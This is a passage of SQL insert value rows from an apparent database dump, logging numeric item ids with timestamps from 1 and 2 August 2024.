(11933, NULL, NULL, 2058, 1, '2024-08-01 03:12:53'),
(11934, NULL, NULL, 2055, 1, '2024-08-01 03:12:55'),
(11935, NULL, NULL, 2054, 1, '2024-08-01 03:13:00'),
(11936, NULL, NULL, 2064, 1, '2024-08-01 03:13:10'),
(11937, NULL, NULL, 2063, 1, '2024-08-01 03:13:13'),
(11938, NULL, NULL, 2062, 1, '2024-08-01 03:13:15'),
(11939, NULL, NULL, 2061, 1, '2024-08-01 03:13:18'),
(11940, NULL, NULL, 2060, 1, '2024-08-01 03:13:21'),
(11941, NULL, NULL, 2059, 1, '2024-08-01 03:13:24'),
(11942, NULL, NULL, 2058, 1, '2024-08-01 03:13:27'),
(11943, NULL, NULL, 2055, 1, '2024-08-01 03:13:30'),
(11944, NULL, NULL, 2054, 1, '2024-08-01 03:13:33'),
(11945, NULL, NULL, 2062, 1, '2024-08-01 05:10:10'),
(11946, NULL, NULL, 2064, 1, '2024-08-01 05:10:17'),
(11947, NULL, NULL, 2061, 1, '2024-08-01 05:10:20'),
(11948, NULL, NULL, 2058, 1, '2024-08-01 05:10:24'),
(11949, NULL, NULL, 2055, 1, '2024-08-01 05:10:28'),
(11950, NULL, NULL, 2059, 1, '2024-08-01 05:10:31'),
(11951, NULL, NULL, 2061, 1, '2024-08-01 05:10:38'),
(11952, NULL, NULL, 2059, 1, '2024-08-01 05:10:41'),
(11953, NULL, NULL, 2058, 1, '2024-08-01 05:10:44'),
(11954, NULL, NULL, 2054, 1, '2024-08-01 05:10:47'),
(11955, NULL, NULL, 2060, 1, '2024-08-01 05:10:50'),
(11956, NULL, NULL, 2061, 1, '2024-08-01 05:10:59'),
(11957, NULL, NULL, 2063, 1, '2024-08-01 05:11:01'),
(11958, NULL, NULL, 2055, 1, '2024-08-01 05:11:07'),
(11959, NULL, NULL, 2054, 1, '2024-08-01 05:11:11'),
(11960, NULL, NULL, 2064, 1, '2024-08-01 05:11:14'),
(11961, NULL, NULL, 2058, 1, '2024-08-01 05:11:19'),
(11962, NULL, NULL, 2059, 1, '2024-08-01 05:11:22'),
(11963, NULL, NULL, 2060, 1, '2024-08-01 05:11:26'),
(11964, NULL, NULL, 2061, 1, '2024-08-01 05:11:30'),
(11965, NULL, NULL, 2062, 1, '2024-08-01 05:11:33'),
(11966, NULL, NULL, 2063, 1, '2024-08-01 05:11:38'),
(11967, NULL, NULL, 2064, 1, '2024-08-01 05:11:46'),
(11968, NULL, NULL, 2063, 1, '2024-08-01 05:11:50'),
(11969, NULL, NULL, 2062, 1, '2024-08-01 05:11:53'),
(11970, NULL, NULL, 2061, 1, '2024-08-01 05:11:56'),
(11971, NULL, NULL, 2060, 1, '2024-08-01 05:12:01'),
(11972, NULL, NULL, 2059, 1, '2024-08-01 05:12:07'),
(11973, NULL, NULL, 2058, 1, '2024-08-01 05:12:10'),
(11974, NULL, NULL, 2055, 1, '2024-08-01 05:12:13'),
(11975, NULL, NULL, 2054, 1, '2024-08-01 05:12:17'),
(11976, NULL, NULL, 2053, 1, '2024-08-01 05:12:20'),
(11977, NULL, NULL, 2058, 1, '2024-08-01 05:12:24'),
(11978, NULL, NULL, 2064, 1, '2024-08-01 05:12:31'),
(11979, NULL, NULL, 2058, 1, '2024-08-01 05:12:35'),
(11980, NULL, NULL, 2059, 1, '2024-08-01 05:12:40'),
(11981, NULL, NULL, 2060, 1, '2024-08-01 05:12:43'),
(11982, NULL, NULL, 2061, 1, '2024-08-01 05:12:47'),
(11983, NULL, NULL, 2062, 1, '2024-08-01 05:12:51'),
(11984, NULL, NULL, 2063, 1, '2024-08-01 05:12:56'),
(11985, NULL, NULL, 2064, 1, '2024-08-01 05:13:09'),
(11986, NULL, NULL, 2058, 1, '2024-08-01 05:13:13'),
(11987, NULL, NULL, 2059, 1, '2024-08-01 05:13:17'),
(11988, NULL, NULL, 2060, 1, '2024-08-01 05:13:20'),
(11989, NULL, NULL, 2061, 1, '2024-08-01 05:13:23'),
(11990, NULL, NULL, 2062, 1, '2024-08-01 05:13:27'),
(11991, NULL, NULL, 2063, 1, '2024-08-01 05:13:32'),
(11992, NULL, NULL, 2064, 1, '2024-08-01 05:13:43'),
(11993, NULL, NULL, 2063, 1, '2024-08-01 05:13:47'),
(11994, NULL, NULL, 2062, 1, '2024-08-01 05:13:51'),
(11995, NULL, NULL, 2061, 1, '2024-08-01 05:13:55'),
(11996, NULL, NULL, 2060, 1, '2024-08-01 05:13:58'),
(11997, NULL, NULL, 2059, 1, '2024-08-01 05:14:03'),
(11998, NULL, NULL, 2058, 1, '2024-08-01 05:14:07'),
(11999, NULL, NULL, 2055, 1, '2024-08-01 05:14:11'),
(12000, NULL, NULL, 2054, 1, '2024-08-01 05:14:16'),
(12001, NULL, NULL, 2064, 1, '2024-08-01 05:14:39'),
(12002, NULL, NULL, 2063, 1, '2024-08-01 05:14:45'),
(12003, NULL, NULL, 2062, 1, '2024-08-01 05:14:48'),
(12004, NULL, NULL, 2061, 1, '2024-08-01 05:14:51'),
(12005, NULL, NULL, 2060, 1, '2024-08-01 05:14:55'),
(12006, NULL, NULL, 2059, 1, '2024-08-01 05:14:59'),
(12007, NULL, NULL, 2058, 1, '2024-08-01 05:15:01'),
(12008, NULL, NULL, 2055, 1, '2024-08-01 05:15:05'),
(12009, NULL, NULL, 2054, 1, '2024-08-01 05:15:08'),
(12010, NULL, NULL, 2064, 1, '2024-08-01 05:15:17'),
(12011, NULL, NULL, 2063, 1, '2024-08-01 05:15:22'),
(12012, NULL, NULL, 2062, 1, '2024-08-01 05:15:26'),
(12013, NULL, NULL, 2061, 1, '2024-08-01 05:15:30'),
(12014, NULL, NULL, 2060, 1, '2024-08-01 05:15:33'),
(12015, NULL, NULL, 2059, 1, '2024-08-01 05:15:37'),
(12016, NULL, NULL, 2058, 1, '2024-08-01 05:15:41'),
(12017, NULL, NULL, 2055, 1, '2024-08-01 05:15:45'),
(12018, NULL, NULL, 2054, 1, '2024-08-01 05:15:49'),
(12019, NULL, NULL, 2064, 1, '2024-08-01 05:15:55'),
(12020, NULL, NULL, 2063, 1, '2024-08-01 05:16:00'),
(12021, NULL, NULL, 2062, 1, '2024-08-01 05:16:04'),
(12022, NULL, NULL, 2061, 1, '2024-08-01 05:16:06'),
(12023, NULL, NULL, 2060, 1, '2024-08-01 05:16:11'),
(12024, NULL, NULL, 2059, 1, '2024-08-01 05:16:14'),
(12025, NULL, NULL, 2058, 1, '2024-08-01 05:16:17'),
(12026, NULL, NULL, 2055, 1, '2024-08-01 05:16:22'),
(12027, NULL, NULL, 2054, 1, '2024-08-01 05:16:26'),
(12028, NULL, NULL, 2064, 1, '2024-08-01 05:16:37'),
(12029, NULL, NULL, 2063, 1, '2024-08-01 05:16:41'),
(12030, NULL, NULL, 2062, 1, '2024-08-01 05:16:46'),
(12031, NULL, NULL, 2061, 1, '2024-08-01 05:16:49'),
(12032, NULL, NULL, 2060, 1, '2024-08-01 05:16:53'),
(12033, NULL, NULL, 2059, 1, '2024-08-01 05:16:57'),
(12034, NULL, NULL, 2058, 1, '2024-08-01 05:17:02'),
(12035, NULL, NULL, 2055, 1, '2024-08-01 05:17:06'),
(12036, NULL, NULL, 2054, 1, '2024-08-01 05:17:10'),
(12037, NULL, NULL, 2054, 1, '2024-08-01 14:17:40'),
(12038, NULL, NULL, 2064, 1, '2024-08-01 18:12:54'),
(12039, NULL, NULL, 2059, 1, '2024-08-01 19:50:37'),
(12040, NULL, NULL, 2062, 1, '2024-08-02 01:58:40'),
(12041, NULL, NULL, 2059, 1, '2024-08-02 01:58:46'),
(12042, NULL, NULL, 2064, 1, '2024-08-02 01:58:49'),
(12043, NULL, NULL, 2054, 1, '2024-08-02 01:58:57'),
(12044, NULL, NULL, 2061, 1, '2024-08-02 01:59:01'),
(12045, NULL, NULL, 2064, 1, '2024-08-02 01:59:10'),
(12046, NULL, NULL, 2063, 1, '2024-08-02 01:59:15'),
(12047, NULL, NULL, 2062, 1, '2024-08-02 01:59:25'),
(12048, NULL, NULL, 2061, 1, '2024-08-02 01:59:30'),
(12049, NULL, NULL, 2060, 1, '2024-08-02 01:59:34'),
(12050, NULL, NULL, 2059, 1, '2024-08-02 01:59:39'),
(12051, NULL, NULL, 2058, 1, '2024-08-02 01:59:42'),
(12052, NULL, NULL, 2055, 1, '2024-08-02 01:59:48'),
(12053, NULL, NULL, 2054, 1, '2024-08-02 01:59:52'),
(12054, NULL, NULL, 2053, 1, '2024-08-02 02:00:01'),
(12055, NULL, NULL, 2060, 1, '2024-08-02 02:00:06'),
(12056, NULL, NULL, 2055, 1, '2024-08-02 02:01:14'),
(12057, NULL, NULL, 2058, 1, '2024-08-02 02:01:20'),
(12058, NULL, NULL, 2063, 1, '2024-08-02 02:01:28'),
(12059, NULL, NULL, 2064, 1, '2024-08-02 02:01:42'),
(12060, NULL, NULL, 2063, 1, '2024-08-02 02:01:46'),
(12061, NULL, NULL, 2062, 1, '2024-08-02 02:01:50'),
(12062, NULL, NULL, 2061, 1, '2024-08-02 02:01:54'),
(12063, NULL, NULL, 2060, 1, '2024-08-02 02:01:57'),
(12064, NULL, NULL, 2059, 1, '2024-08-02 02:02:01'),
(12065, NULL, NULL, 2058, 1, '2024-08-02 02:02:03'),
(12066, NULL, NULL, 2055, 1, '2024-08-02 02:02:06'),
(12067, NULL, NULL, 2054, 1, '2024-08-02 02:02:10'),
(12068, NULL, NULL, 2064, 1, '2024-08-02 02:02:20'),
(12069, NULL, NULL, 2063, 1, '2024-08-02 02:02:27'),
(12070, NULL, NULL, 2062, 1, '2024-08-02 02:02:32'),
(12071, NULL, NULL, 2061, 1, '2024-08-02 02:02:35'),
(12072, NULL, NULL, 2060, 1, '2024-08-02 02:02:39'),
(12073, NULL, NULL, 2059, 1, '2024-08-02 02:02:42'),
(12074, NULL, NULL, 2058, 1, '2024-08-02 02:02:45'),
(12075, NULL, NULL, 2055, 1, '2024-08-02 02:02:50'),
(12076, NULL, NULL, 2054, 1, '2024-08-02 02:02:54'),
(12077, NULL, NULL, 2064, 1, '2024-08-02 02:03:14'),
(12078, NULL, NULL, 2063, 1, '2024-08-02 02:03:17'),
(12079, NULL, NULL, 2062, 1, '2024-08-02 02:03:20'),
(12080, NULL, NULL, 2061, 1, '2024-08-02 02:03:24'),
(12081, NULL, NULL, 2060, 1, '2024-08-02 02:03:31'),
(12082, NULL, NULL, 2059, 1, '2024-08-02 02:03:39'),
(12083, NULL, NULL, 2058, 1, '2024-08-02 02:03:43'),
(12084, NULL, NULL, 2055, 1, '2024-08-02 02:03:47'),
(12085, NULL, NULL, 2054, 1, '2024-08-02 02:03:52'),
(12086, NULL, NULL, 2064, 1, '2024-08-02 02:04:04'),
(12087, NULL, NULL, 2063, 1, '2024-08-02 02:04:09'),
(12088, NULL, NULL, 2062, 1, '2024-08-02 02:04:12'),
(12089, NULL, NULL, 2061, 1, '2024-08-02 02:04:16'),
(12090, NULL, NULL, 2060, 1, '2024-08-02 02:04:20'),
(12091, NULL, NULL, 2059, 1, '2024-08-02 02:04:24'),
(12092, NULL, NULL, 2058, 1, '2024-08-02 02:04:28'),
(12093, NULL, NULL, 2055, 1, '2024-08-02 02:04:31'),
(12094, NULL, NULL, 2054, 1, '2024-08-02 02:04:34'),
(12095, NULL, NULL, 2064, 1, '2024-08-02 02:04:42'),
(12096, NULL, NULL, 2058, 1, '2024-08-02 02:04:50'),
(12097, NULL, NULL, 2059, 1, '2024-08-02 02:04:54'),
(12098, NULL, NULL, 2060, 1, '2024-08-02 02:04:59'),
(12099, NULL, NULL, 2061, 1, '2024-08-02 02:05:07'),
(12100, NULL, NULL, 2062, 1, '2024-08-02 02:05:12'),
(12101, NULL, NULL, 2063, 1, '2024-08-02 02:05:20'),
(12102, NULL, NULL, 2064, 1, '2024-08-02 02:05:40'),
(12103, NULL, NULL, 2063, 1, '2024-08-02 02:05:45'),
(12104, NULL, NULL, 2062, 1, '2024-08-02 02:05:51'),
(12105, NULL, NULL, 2061, 1, '2024-08-02 02:05:55'),
(12106, NULL, NULL, 2060, 1, '2024-08-02 02:06:00'),
(12107, NULL, NULL, 2059, 1, '2024-08-02 02:06:03'),
(12108, NULL, NULL, 2058, 1, '2024-08-02 02:06:06'),
(12109, NULL, NULL, 2055, 1, '2024-08-02 02:06:13'),
(12110, NULL, NULL, 2054, 1, '2024-08-02 02:06:16'),
(12111, NULL, NULL, 2064, 1, '2024-08-02 02:06:19'),
(12112, NULL, NULL, 2058, 1, '2024-08-02 02:06:38'),
(12113, NULL, NULL, 2059, 1, '2024-08-02 02:06:45'),
(12114, NULL, NULL, 2060, 1, '2024-08-02 02:06:50'),
(12115, NULL, NULL, 2061, 1, '2024-08-02 02:06:53'),
(12116, NULL, NULL, 2062, 1, '2024-08-02 02:06:56'),
(12117, NULL, NULL, 2063, 1, '2024-08-02 02:07:01'),
(12118, NULL, NULL, 2061, 1, '2024-08-02 04:12:02'),
(12119, NULL, NULL, 2059, 1, '2024-08-02 04:12:05'),
(12120, NULL, NULL, 2058, 1, '2024-08-02 04:12:08'),
(12121, NULL, NULL, 2054, 1, '2024-08-02 04:12:11'),
(12122, NULL, NULL, 2055, 1, '2024-08-02 04:12:15'),
(12123, NULL, NULL, 2061, 1, '2024-08-02 04:12:18'),
(12124, NULL, NULL, 2064, 1, '2024-08-02 04:12:20'),
(12125, NULL, NULL, 2064, 1, '2024-08-02 04:12:26'),
(12126, NULL, NULL, 2063, 1, '2024-08-02 04:12:29'),
(12127, NULL, NULL, 2062, 1, '2024-08-02 04:12:31'),
(12128, NULL, NULL, 2061, 1, '2024-08-02 04:12:34'),
(12129, NULL, NULL, 2060, 1, '2024-08-02 04:12:36'),
(12130, NULL, NULL, 2059, 1, '2024-08-02 04:12:40'),
(12131, NULL, NULL, 2058, 1, '2024-08-02 04:12:43'),
(12132, NULL, NULL, 2055, 1, '2024-08-02 04:12:46'),
(12133, NULL, NULL, 2054, 1, '2024-08-02 04:12:48'),
(12134, NULL, NULL, 2053, 1, '2024-08-02 04:12:51'),
(12135, NULL, NULL, 2063, 1, '2024-08-02 04:12:53'),
(12136, NULL, NULL, 2064, 1, '2024-08-02 04:12:58'),
(12137, NULL, NULL, 2063, 1, '2024-08-02 04:13:01'),
(12138, NULL, NULL, 2062, 1, '2024-08-02 04:13:03'),
(12139, NULL, NULL, 2061, 1, '2024-08-02 04:13:05'),
(12140, NULL, NULL, 2060, 1, '2024-08-02 04:13:08'),
(12141, NULL, NULL, 2060, 1, '2024-08-02 04:13:10'),
(12142, NULL, NULL, 2054, 1, '2024-08-02 04:13:14'),
(12143, NULL, NULL, 2059, 1, '2024-08-02 04:13:17'),
(12144, NULL, NULL, 2058, 1, '2024-08-02 04:13:20'),
(12145, NULL, NULL, 2062, 1, '2024-08-02 04:13:26'),
(12146, NULL, NULL, 2064, 1, '2024-08-02 04:13:38'),
(12147, NULL, NULL, 2063, 1, '2024-08-02 04:13:42'),
(12148, NULL, NULL, 2062, 1, '2024-08-02 04:13:45'),
(12149, NULL, NULL, 2061, 1, '2024-08-02 04:13:48'),
(12150, NULL, NULL, 2060, 1, '2024-08-02 04:13:52'),
(12151, NULL, NULL, 2059, 1, '2024-08-02 04:13:55'),
(12152, NULL, NULL, 2058, 1, '2024-08-02 04:14:00'),
(12153, NULL, NULL, 2055, 1, '2024-08-02 04:14:06'),
(12154, NULL, NULL, 2054, 1, '2024-08-02 04:14:13'),
(12155, NULL, NULL, 2064, 1, '2024-08-02 04:14:31'),
(12156, NULL, NULL, 2058, 1, '2024-08-02 04:14:40'),
(12157, NULL, NULL, 2059, 1, '2024-08-02 04:14:46'),
(12158, NULL, NULL, 2060, 1, '2024-08-02 04:14:53'),
(12159, NULL, NULL, 2061, 1, '2024-08-02 04:14:59'),
(12160, NULL, NULL, 2062, 1, '2024-08-02 04:15:01'),
(12161, NULL, NULL, 2063, 1, '2024-08-02 04:15:04'),
(12162, NULL, NULL, 2064, 1, '2024-08-02 04:15:15'),
(12163, NULL, NULL, 2063, 1, '2024-08-02 04:15:19'),
(12164, NULL, NULL, 2062, 1, '2024-08-02 04:15:22'),
(12165, NULL, NULL, 2061, 1, '2024-08-02 04:15:25'),
(12166, NULL, NULL, 2060, 1, '2024-08-02 04:15:28'),
(12167, NULL, NULL, 2059, 1, '2024-08-02 04:15:33'),
(12168, NULL, NULL, 2058, 1, '2024-08-02 04:15:36'),
(12169, NULL, NULL, 2055, 1, '2024-08-02 04:15:41'),
(12170, NULL, NULL, 2054, 1, '2024-08-02 04:15:43'),
(12171, NULL, NULL, 2064, 1, '2024-08-02 04:16:01'),
(12172, NULL, NULL, 2063, 1, '2024-08-02 04:16:07'),
(12173, NULL, NULL, 2062, 1, '2024-08-02 04:16:10'),
(12174, NULL, NULL, 2061, 1, '2024-08-02 04:16:14'),
(12175, NULL, NULL, 2060, 1, '2024-08-02 04:16:17'),
(12176, NULL, NULL, 2059, 1, '2024-08-02 04:16:20'),
(12177, NULL, NULL, 2058, 1, '2024-08-02 04:16:23'),
(12178, NULL, NULL, 2055, 1, '2024-08-02 04:16:26'),
(12179, NULL, NULL, 2054, 1, '2024-08-02 04:16:29'),
(12180, NULL, NULL, 2064, 1, '2024-08-02 04:16:44'),
(12181, NULL, NULL, 2058, 1, '2024-08-02 04:16:48'),
(12182, NULL, NULL, 2059, 1, '2024-08-02 04:16:51'),
(12183, NULL, NULL, 2060, 1, '2024-08-02 04:16:56'),
(12184, NULL, NULL, 2061, 1, '2024-08-02 04:17:00'),
(12185, NULL, NULL, 2062, 1, '2024-08-02 04:17:02'),
(12186, NULL, NULL, 2063, 1, '2024-08-02 04:17:06'),
(12187, NULL, NULL, 2064, 1, '2024-08-02 04:17:24'),
(12188, NULL, NULL, 2063, 1, '2024-08-02 04:17:29'),
(12189, NULL, NULL, 2062, 1, '2024-08-02 04:17:34'),
(12190, NULL, NULL, 2061, 1, '2024-08-02 04:17:38'),
(12191, NULL, NULL, 2060, 1, '2024-08-02 04:17:42'),
(12192, NULL, NULL, 2059, 1, '2024-08-02 04:17:45'),
(12193, NULL, NULL, 2058, 1, '2024-08-02 04:17:49'),
(12194, NULL, NULL, 2055, 1, '2024-08-02 04:17:57'),
(12195, NULL, NULL, 2054, 1, '2024-08-02 04:17:59'),
(12196, NULL, NULL, 2064, 1, '2024-08-02 04:18:15'),
(12197, NULL, NULL, 2063, 1, '2024-08-02 04:18:19'),
(12198, NULL, NULL, 2062, 1, '2024-08-02 04:18:22'),
(12199, NULL, NULL, 2061, 1, '2024-08-02 04:18:25'),
(12200, NULL, NULL, 2060, 1, '2024-08-02 04:18:28'),
(12201, NULL, NULL, 2059, 1, '2024-08-02 04:18:31'),
(12202, NULL, NULL, 2058, 1, '2024-08-02 04:18:35'),
(12203, NULL, NULL, 2055, 1, '2024-08-02 04:18:40'),
(12204, NULL, NULL, 2054, 1, '2024-08-02 04:18:50'),
(12205, NULL, NULL, 2063, 1, '2024-08-02 05:41:32'),
(12206, NULL, NULL, 2059, 1, '2024-08-02 06:40:59'),
(12207, NULL, NULL, 2059, 1, '2024-08-02 06:52:44'),
(12208, NULL, NULL, 2064, 1, '2024-08-02 07:44:16'),
(12209, NULL, NULL, 2058, 1, '2024-08-02 09:36:38'),
(12210, NULL, NULL, 2062, 1, '2024-08-02 12:08:54'),
(12211, NULL, NULL, 2061, 1, '2024-08-02 12:09:02'),
(12212, NULL, NULL, 2055, 1, '2024-08-02 12:09:04'),
(12213, NULL, NULL, 2061, 1, '2024-08-02 12:09:10'),
(12214, NULL, NULL, 2059, 1, '2024-08-02 12:09:12'),
(12215, NULL, NULL, 2058, 1, '2024-08-02 12:09:16'),
(12216, NULL, NULL, 2054, 1, '2024-08-02 12:09:19'),
(12217, NULL, NULL, 2054, 1, '2024-08-02 12:09:23'),
(12218, NULL, NULL, 2059, 1, '2024-08-02 12:09:26'),
(12219, NULL, NULL, 2064, 1, '2024-08-02 12:09:34'),
(12220, NULL, NULL, 2061, 1, '2024-08-02 12:09:38'),
(12221, NULL, NULL, 2058, 1, '2024-08-02 12:09:41'),
(12222, NULL, NULL, 2055, 1, '2024-08-02 12:09:44'),
(12223, NULL, NULL, 2064, 1, '2024-08-02 12:09:47'),
(12224, NULL, NULL, 2058, 1, '2024-08-02 12:09:52'),
(12225, NULL, NULL, 2059, 1, '2024-08-02 12:09:56'),
(12226, NULL, NULL, 2060, 1, '2024-08-02 12:09:58'),
(12227, NULL, NULL, 2061, 1, '2024-08-02 12:10:01'),
(12228, NULL, NULL, 2062, 1, '2024-08-02 12:10:04'),
(12229, NULL, NULL, 2063, 1, '2024-08-02 12:10:07'),
(12230, NULL, NULL, 2058, 1, '2024-08-02 12:10:10'),
(12231, NULL, NULL, 2064, 1, '2024-08-02 12:10:17'),
(12232, NULL, NULL, 2063, 1, '2024-08-02 12:10:21'),
(12233, NULL, NULL, 2062, 1, '2024-08-02 12:10:24'),
(12234, NULL, NULL, 2061, 1, '2024-08-02 12:10:28'),
(12235, NULL, NULL, 2060, 1, '2024-08-02 12:10:30'),
(12236, NULL, NULL, 2059, 1, '2024-08-02 12:10:35'),
(12237, NULL, NULL, 2058, 1, '2024-08-02 12:10:38'),
(12238, NULL, NULL, 2055, 1, '2024-08-02 12:10:41'),
(12239, NULL, NULL, 2054, 1, '2024-08-02 12:10:44'),
(12240, NULL, NULL, 2053, 1, '2024-08-02 12:10:48'),
(12241, NULL, NULL, 2063, 1, '2024-08-02 12:10:51'),
(12242, NULL, NULL, 2060, 1, '2024-08-02 12:10:54'),
(12243, NULL, NULL, 2064, 1, '2024-08-02 12:11:03'),
(12244, NULL, NULL, 2063, 1, '2024-08-02 12:11:08'),
(12245, NULL, NULL, 2062, 1, '2024-08-02 12:11:11'),
(12246, NULL, NULL, 2061, 1, '2024-08-02 12:11:15'),
(12247, NULL, NULL, 2060, 1, '2024-08-02 12:11:18'),
(12248, NULL, NULL, 2059, 1, '2024-08-02 12:11:22'),
(12249, NULL, NULL, 2058, 1, '2024-08-02 12:11:25'),
(12250, NULL, NULL, 2055, 1, '2024-08-02 12:11:30'),
(12251, NULL, NULL, 2054, 1, '2024-08-02 12:11:34'),
(12252, NULL, NULL, 2064, 1, '2024-08-02 12:11:41'),
(12253, NULL, NULL, 2063, 1, '2024-08-02 12:11:45'),
(12254, NULL, NULL, 2062, 1, '2024-08-02 12:11:48'),
(12255, NULL, NULL, 2061, 1, '2024-08-02 12:11:51'),
(12256, NULL, NULL, 2060, 1, '2024-08-02 12:11:54'),
(12257, NULL, NULL, 2059, 1, '2024-08-02 12:11:56'),
(12258, NULL, NULL, 2058, 1, '2024-08-02 12:12:00'),
(12259, NULL, NULL, 2055, 1, '2024-08-02 12:12:03'),
(12260, NULL, NULL, 2054, 1, '2024-08-02 12:12:07'),
(12261, NULL, NULL, 2064, 1, '2024-08-02 12:12:16'),
(12262, NULL, NULL, 2063, 1, '2024-08-02 12:12:22'),
(12263, NULL, NULL, 2062, 1, '2024-08-02 12:12:26'),
(12264, NULL, NULL, 2061, 1, '2024-08-02 12:12:28'),
(12265, NULL, NULL, 2060, 1, '2024-08-02 12:12:32'),
(12266, NULL, NULL, 2059, 1, '2024-08-02 12:12:36'),
(12267, NULL, NULL, 2058, 1, '2024-08-02 12:12:40'),
(12268, NULL, NULL, 2055, 1, '2024-08-02 12:12:43'),
(12269, NULL, NULL, 2054, 1, '2024-08-02 12:12:46'),
(12270, NULL, NULL, 2064, 1, '2024-08-02 12:12:50'),
(12271, NULL, NULL, 2058, 1, '2024-08-02 12:12:54'),
(12272, NULL, NULL, 2059, 1, '2024-08-02 12:12:57'),
(12273, NULL, NULL, 2060, 1, '2024-08-02 12:13:00'),
(12274, NULL, NULL, 2061, 1, '2024-08-02 12:13:04'),
(12275, NULL, NULL, 2062, 1, '2024-08-02 12:13:08'),
(12276, NULL, NULL, 2063, 1, '2024-08-02 12:13:11'),
(12277, NULL, NULL, 2064, 1, '2024-08-02 12:13:30'),
(12278, NULL, NULL, 2063, 1, '2024-08-02 12:13:35'),
(12279, NULL, NULL, 2062, 1, '2024-08-02 12:13:39'),
(12280, NULL, NULL, 2061, 1, '2024-08-02 12:13:42'),
(12281, NULL, NULL, 2060, 1, '2024-08-02 12:13:46'),
(12282, NULL, NULL, 2059, 1, '2024-08-02 12:13:50'),
(12283, NULL, NULL, 2058, 1, '2024-08-02 12:13:54'),
(12284, NULL, NULL, 2055, 1, '2024-08-02 12:13:57'),
(12285, NULL, NULL, 2054, 1, '2024-08-02 12:14:01'),
(12286, NULL, NULL, 2064, 1, '2024-08-02 12:14:08'),
(12287, NULL, NULL, 2063, 1, '2024-08-02 12:14:12'),
(12288, NULL, NULL, 2062, 1, '2024-08-02 12:14:15'),
(12289, NULL, NULL, 2061, 1, '2024-08-02 12:14:19'),
(12290, NULL, NULL, 2060, 1, '2024-08-02 12:14:21'),
(12291, NULL, NULL, 2059, 1, '2024-08-02 12:14:25'),
(12292, NULL, NULL, 2058, 1, '2024-08-02 12:14:29'),
(12293, NULL, NULL, 2055, 1, '2024-08-02 12:14:32'),
(12294, NULL, NULL, 2054, 1, '2024-08-02 12:14:35'),
(12295, NULL, NULL, 2064, 1, '2024-08-02 12:14:46'),
(12296, NULL, NULL, 2058, 1, '2024-08-02 12:14:50'),
(12297, NULL, NULL, 2059, 1, '2024-08-02 12:14:53'),
(12298, NULL, NULL, 2060, 1, '2024-08-02 12:14:55'),
(12299, NULL, NULL, 2061, 1, '2024-08-02 12:14:58'),
(12300, NULL, NULL, 2062, 1, '2024-08-02 12:15:00'),
(12301, NULL, NULL, 2063, 1, '2024-08-02 12:15:03'),
(12302, NULL, NULL, 2059, 1, '2024-08-02 14:44:37'),
(12303, NULL, NULL, 2055, 1, '2024-08-02 14:47:40'),
(12304, NULL, NULL, 2059, 1, '2024-08-02 14:47:42'),
(12305, NULL, NULL, 2061, 1, '2024-08-02 14:47:47'),
(12306, NULL, NULL, 2062, 1, '2024-08-02 14:47:50'),
(12307, NULL, NULL, 2060, 1, '2024-08-02 14:47:55'),
(12308, NULL, NULL, 2064, 1, '2024-08-02 14:48:01'),
(12309, NULL, NULL, 2063, 1, '2024-08-02 14:48:03'),
(12310, NULL, NULL, 2062, 1, '2024-08-02 14:48:06'),
(12311, NULL, NULL, 2061, 1, '2024-08-02 14:48:09'),
(12312, NULL, NULL, 2060, 1, '2024-08-02 14:48:11'),
(12313, NULL, NULL, 2054, 1, '2024-08-02 14:48:14'),
(12314, NULL, NULL, 2058, 1, '2024-08-02 14:48:16'),
(12315, NULL, NULL, 2064, 1, '2024-08-02 14:48:20'),
(12316, NULL, NULL, 2058, 1, '2024-08-02 14:48:23'),
(12317, NULL, NULL, 2059, 1, '2024-08-02 14:48:26'),
(12318, NULL, NULL, 2060, 1, '2024-08-02 14:48:28'),
(12319, NULL, NULL, 2061, 1, '2024-08-02 14:48:31'),
(12320, NULL, NULL, 2062, 1, '2024-08-02 14:48:35'),
(12321, NULL, NULL, 2063, 1, '2024-08-02 14:48:38'),
(12322, NULL, NULL, 2063, 1, '2024-08-02 14:48:40'),
(12323, NULL, NULL, 2064, 1, '2024-08-02 14:48:47'),
(12324, NULL, NULL, 2063, 1, '2024-08-02 14:48:50'),
(12325, NULL, NULL, 2062, 1, '2024-08-02 14:48:53'),
(12326, NULL, NULL, 2061, 1, '2024-08-02 14:48:56'),
(12327, NULL, NULL, 2060, 1, '2024-08-02 14:48:59'),
(12328, NULL, NULL, 2059, 1, '2024-08-02 14:49:01'),
(12329, NULL, NULL, 2058, 1, '2024-08-02 14:49:04'),
(12330, NULL, NULL, 2055, 1, '2024-08-02 14:49:06'),
(12331, NULL, NULL, 2054, 1, '2024-08-02 14:49:08'),
(12332, NULL, NULL, 2053, 1, '2024-08-02 14:49:11'),
(12333, NULL, NULL, 2064, 1, '2024-08-02 14:49:19'),
(12334, NULL, NULL, 2063, 1, '2024-08-02 14:49:23'),
(12335, NULL, NULL, 2062, 1, '2024-08-02 14:49:26'),
(12336, NULL, NULL, 2061, 1, '2024-08-02 14:49:28'),
(12337, NULL, NULL, 2060, 1, '2024-08-02 14:49:31'),
(12338, NULL, NULL, 2059, 1, '2024-08-02 14:49:33'),
(12339, NULL, NULL, 2058, 1, '2024-08-02 14:49:35'),
(12340, NULL, NULL, 2055, 1, '2024-08-02 14:49:38'),
(12341, NULL, NULL, 2054, 1, '2024-08-02 14:49:40'),
(12342, NULL, NULL, 2064, 1, '2024-08-02 14:49:52'),
(12343, NULL, NULL, 2063, 1, '2024-08-02 14:49:55'),
(12344, NULL, NULL, 2062, 1, '2024-08-02 14:49:57'),
(12345, NULL, NULL, 2061, 1, '2024-08-02 14:49:59'),
(12346, NULL, NULL, 2060, 1, '2024-08-02 14:50:02'),
(12347, NULL, NULL, 2059, 1, '2024-08-02 14:50:04'),
(12348, NULL, NULL, 2058, 1, '2024-08-02 14:50:07'),
(12349, NULL, NULL, 2055, 1, '2024-08-02 14:50:10'),
(12350, NULL, NULL, 2054, 1, '2024-08-02 14:50:13'),
(12351, NULL, NULL, 2064, 1, '2024-08-02 14:50:27'),
(12352, NULL, NULL, 2063, 1, '2024-08-02 14:50:30'),
(12353, NULL, NULL, 2062, 1, '2024-08-02 14:50:33'),
(12354, NULL, NULL, 2061, 1, '2024-08-02 14:50:35'),
(12355, NULL, NULL, 2060, 1, '2024-08-02 14:50:37'),
(12356, NULL, NULL, 2059, 1, '2024-08-02 14:50:41'),
(12357, NULL, NULL, 2058, 1, '2024-08-02 14:50:43'),
(12358, NULL, NULL, 2055, 1, '2024-08-02 14:50:46'),
(12359, NULL, NULL, 2054, 1, '2024-08-02 14:50:51'),
(12360, NULL, NULL, 2064, 1, '2024-08-02 14:51:06'),
